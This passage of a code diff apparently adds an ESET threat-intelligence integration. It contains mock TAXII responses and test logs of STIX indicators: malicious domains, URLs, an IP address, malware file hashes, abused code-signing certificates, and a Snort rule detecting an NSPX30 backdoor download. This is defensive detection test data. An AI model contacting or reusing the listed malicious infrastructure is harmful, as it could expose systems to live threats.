"2022-03-26T00:00:00Z", + "valid_until": "2023-09-29T00:00:00Z" + }, + { + "created": "2023-10-02T13:16:00.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T13:16:00.000Z", + "pattern": "[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2022-03-26T00:00:00Z", + "valid_until": "2023-09-29T00:00:00Z" + }, + { + "created": "2023-10-02T15:42:54.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", + "kill_chain_phases": [ + { + "kill_chain_name": 
"misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T15:42:54.000Z", + "pattern": "[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-05-05T00:00:00Z", + "valid_until": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T15:46:12.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T15:46:12.000Z", + "pattern": "[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-05-05T00:00:00Z", + "valid_until": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T12:10:47.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T12:10:47.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, 
ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']",
+ "pattern_type": "stix",
+ "pattern_version": "2.1",
+ "spec_version": "indicator",
+ "type": "indicator",
+ "valid_from": "2023-10-02T12:10:47Z"
+ }
+ ],
+ "next": "MjAyMy0xMC0xOVQwMDowNjozNy4xMzcwNjQrMDA6MDB8aW5kaWNhdG9yLS1kNDkxYzc5MC1kODc1LTQ3ZDctOTdmZC01Y2EyYTdhMWIyYmM="
+ }
+ # URL
+ - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/
+ methods: ["GET"]
+ request_headers:
+ Authorization:
+ - "Basic dGVzdDp0ZXN0"
+ query_params:
+ match[type]: "indicator"
+ added_after: "2022-03-02T12:44:27.839Z"
+ responses:
+ - status_code: 200
+ headers:
+ Content-Type: "application/taxii+json;version=2.1"
+ body: |-
+ {}
+ - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/
+ methods: ["GET"]
+ request_headers:
+ Authorization:
+ - "Basic dGVzdDp0ZXN0"
+ query_params:
+ match[type]: "indicator"
+ added_after: "{added_after:.*}"
+ responses:
+ - status_code: 200
+ headers:
+ X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z"
+ Content-Type: "application/taxii+json;version=2.1"
+ body: |-
+ {
+ "more": true,
+ "objects": [
+ {
+ "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc",
+ "type": "indicator",
+ "spec_version": "indicator",
+ "created": "2023-10-19T02:00:13.000Z",
+ "modified": "2023-10-19T02:00:13.000Z",
+ "name":
"https://example.com/some/path",
+ "description": "Host actively distributes high-severity threat in the form of executable code.",
+ "pattern": "[url:value='https://example.com/some/path']",
+ "pattern_type": "stix",
+ "pattern_version": "2.1",
+ "valid_from": "2023-10-19T02:00:13Z",
+ "valid_until": "2023-10-21T02:00:13Z",
+ "labels": [
+ "benign"
+ ]
+ },
+ {
+ "id": "indicator--6a4cd4da-7881-4831-ba48-771cd2788d7f",
+ "type": "indicator",
+ "spec_version": "indicator",
+ "created": "2023-10-19T02:00:13.000Z",
+ "modified": "2023-10-19T02:00:13.000Z",
+ "name": "https://example.com/some/path",
+ "description": "Host actively distributes high-severity threat in the form of executable code.",
+ "pattern": "[url:value='https://example.com/some/path']",
+ "pattern_type": "stix",
+ "pattern_version": "2.1",
+ "valid_from": "2023-10-19T02:00:13Z",
+ "valid_until": "2023-10-21T02:00:13Z",
+ "labels": [
+ "malicious-activity"
+ ]
+ }
+ ],
+ "next": "MjAyMy0xMC0xOVQwMDowMDoyMC43NDg4NTYrMDA6MDB8aW5kaWNhdG9yLS02YTRjZDRkYS03ODgxLTQ4MzEtYmE0OC03NzFjZDI3ODhkN2Y="
+ }
diff --git a/packages/ti_eset/changelog.yml b/packages/ti_eset/changelog.yml
new file mode 100644
index 00000000000..6a906ec20ad
--- /dev/null
+++ b/packages/ti_eset/changelog.yml
@@ -0,0 +1,5 @@
+- version: "0.1.0"
+ changes:
+ - description: ESET Threat Intelligence package
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9255
diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log
new file mode 100644
index 00000000000..cd6aa6841d3
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log
@@ -0,0 +1,28 @@ +{"created": "2024-03-14T18:52:26.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2024-03-14T18:52:26.000Z", "pattern": "[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\, Ltd, CN=Hangil IT Co.\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "2.1", "type": "indicator", "valid_from": "2024-03-14T18:52:26Z"} +{"created": "2024-03-14T19:02:03.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2024-03-14T19:02:03.000Z", "pattern": "[domain-name:resolves_to_refs[*].value = '141.164.63.254']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "2.1", "type": "indicator", "valid_from": "2024-03-14T19:02:03Z"} 
+{"created":"2024-01-15T15:52:02.000Z","created_by_ref":"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f","id":"indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad","kill_chain_phases":[{"kill_chain_name":"misp-category","phase_name":"network"}],"labels":["misp:name=\"x509\"","misp:meta-category=\"network\"","misp:to_ids=\"True\""],"modified":"2024-01-15T15:52:02.000Z","pattern":"[x509-certificate:hashes.MD5 = '71b91c0a53cfc3515e45c8c3b72f88c0' AND x509-certificate:hashes.SHA1 = '30db7d678045e44d882d7652ba6aaa6593c02328' AND x509-certificate:hashes.SHA256 = '37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '008890cab1cd510cd20dab4ce5948cbc3a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2025-04-03 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-03-02 00:00:00+00:00']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2024-01-15T15:52:02Z"} +{"created":"2024-01-15T17:05:32.000Z","created_by_ref":"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f","id":"indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2","kill_chain_phases":[{"kill_chain_name":"misp-category","phase_name":"network"}],"labels":["misp:name=\"x509\"","misp:meta-category=\"network\"","misp:to_ids=\"True\""],"modified":"2024-01-15T17:05:32.000Z","pattern":"[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing 
RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2024-01-15T17:05:32Z"} +{"created": "2023-11-17T19:00:49.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-11-17T19:00:49.000Z", "pattern": "[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = '9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": 
"indicator", "valid_from": "2023-11-17T19:00:49Z"} +{"created": "2023-11-01T04:41:36.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"snort\"", "misp:category=\"Network activity\""], "modified": "2023-11-01T04:41:36.000Z", "pattern": "[alert tcp any any -> any 80 \\\r\n (msg:\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\"; gid:45534554; sid:45030002; rev:1;\\\r\n metadata: author \"ESET Research\", date \"2023-10-31\", hash \"82295E138E89F37DD0E51B1723775CBE33D26475\",\\\r\n copyright \"ESET Research\", distribution \"Distribution is forbidden. Do not upload to any multi-scanner or share on any threat intel platform.\";\\\r\n content: \"GET /id=\"; content: \"User-Agent: Mozilla/4.0 (compatible\\;MSIE 5.0\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\";)]", "pattern_type": "snort", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-11-01T04:41:36Z"} +{"created": "2023-09-29T09:12:42.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:12:42.000Z", "pattern": "[domain-name:value = 'acertab.info']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-14T11:39:37Z"} +{"created": "2023-09-29T08:48:51.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": 
["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:51.000Z", "pattern": "[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T08:48:51Z"} +{"created": "2023-09-29T09:00:06.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:00:06.000Z", "pattern": "[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = '4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = '732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T14:40:01Z"} +{"created": "2023-09-29T09:00:10.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", "kill_chain_phases": [{"kill_chain_name": "misp-category", 
"phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:00:10.000Z", "pattern": "[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T19:07:41Z"} +{"created": "2023-09-29T08:48:42.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:42.000Z", "pattern": "[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-26T07:00:04Z"} +{"created": "2023-09-29T08:48:47.000Z", "created_by_ref": 
"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:47.000Z", "pattern": "[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = '354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-19T12:07:09Z"} +{"created": "2023-09-29T08:48:51.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:51.000Z", "pattern": "[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = '5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 
'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-14T11:39:37Z"} +{"created": "2023-09-29T08:59:10.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:59:10.000Z", "pattern": "[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-25T08:02:07Z"} +{"created": "2023-09-29T08:59:50.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:59:50.000Z", 
"pattern": "[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = '9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-07T09:01:06Z"} +{"created": "2023-10-03T13:20:09.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T13:20:09.000Z", "pattern": "[domain-name:value = 'anguisbi.ru']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-07T06:13:58Z"} +{"created": "2023-10-03T13:20:52.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T13:20:52.000Z", "pattern": "[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-08T06:31:14Z"} +{"created": 
"2023-10-03T11:49:09.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T11:49:09.000Z", "pattern": "[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00a9 2005-2010 Oleg N. 
Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-27T05:34:03Z"} +{"created": "2023-09-29T19:44:05.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"email-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T19:44:05.000Z", "pattern": "[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T19:44:05Z"} +{"created": "2023-09-29T17:58:54.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": 